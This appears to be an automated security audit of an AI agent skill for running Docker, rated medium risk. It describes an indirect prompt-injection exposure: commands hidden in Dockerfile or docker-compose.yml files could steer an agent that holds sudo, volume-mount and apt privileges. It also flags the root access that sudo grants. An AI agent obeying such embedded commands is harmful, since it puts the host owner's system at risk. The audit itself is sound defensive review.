linux-docker
Warn
Audited by Gen Agent Trust Hub on Mar 7, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONPROMPT_INJECTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill facilitates the execution of Docker and Docker Compose commands and recommends the use of 'sudo' to address permission issues, which grants the AI agent root-level privileges on the host system.
- [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection due to its handling of untrusted configuration data. (1) Ingestion points: The skill reads and parses 'Dockerfile' and 'docker-compose.yml' from the filesystem. (2) Boundary markers: No markers or instructions are provided to the agent to ignore potentially malicious commands embedded in these files. (3) Capability inventory: Capabilities include 'docker build', 'docker run' (with volume mounting support), 'docker-compose', and system-level 'apt install'. (4) Sanitization: There is no described process for validating or sanitizing file contents, although the skill proactively recommends runtime hardening flags like '--cap-drop ALL' and '--read-only'.
- [EXTERNAL_DOWNLOADS]: The skill provides instructions for installing 'docker.io' via the system package manager (apt), which is a standard procedure for configuring the required environment.
Audit Metadata